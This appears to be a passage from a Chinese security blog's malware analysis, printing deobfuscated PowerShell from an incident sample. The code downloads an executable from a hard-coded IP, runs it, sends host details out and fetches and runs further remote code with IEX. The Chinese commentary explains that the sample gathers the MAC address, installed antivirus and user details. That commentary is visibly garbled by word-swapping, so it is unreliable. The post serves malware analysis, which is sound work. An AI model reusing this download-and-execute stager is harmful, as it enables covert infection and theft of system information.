if(((Get-Service Ddriver | Sort -Property Status).Status -ne "Running") -and (-not (test-path $path))){
    (New-Object System.Net.WebClient).DownloadFile("$download","$download_tmp")
    [System.Threading.Thread]::Sleep(1000*10)
    $size = (Get-ChildItem $download_tmp -recurse | Measure-Object -property length -sum).sum
    $exec = New-Object -com shell.application;
    $exec.shellexecute($download_tmp);
    [System.Threading.Thread]::Sleep(1000*40)
    $download3 = "http://172.104.73.9/new.json?3" + (Get-Service Ddriver | Sort -Property Status).Status + "&size=" + $size + $key
    IEX (New-Object Net.WebClient).downloadstring("$download3")
}else{
    IEX (New-Object Net.WebClient).DownloadString("$download2")
}
}catch{}
try{
    New-Item $path -type file
}catch{}

大抵意义是,猎取mac地点,AntiVirusProduct(本机装置的杀软称号),是不是装置360的产物,也就是zhudongfangyu。
猎取体系版本号,体系位数,电脑称号,用户名等,拼接在参数中并要求下载exe,json文件。样本中地点是http://172.104.73.9/dll.exe,然则如今已没法访问。
这里会推断一下Driver效劳是不是在运转,若是运转的话,就不会下载了。下载后的名字应该是update.exe,然后实行。横竖这个代码也很简朴,我都已帮人人去掉殽杂了。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明某紧急对应的样品分析
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址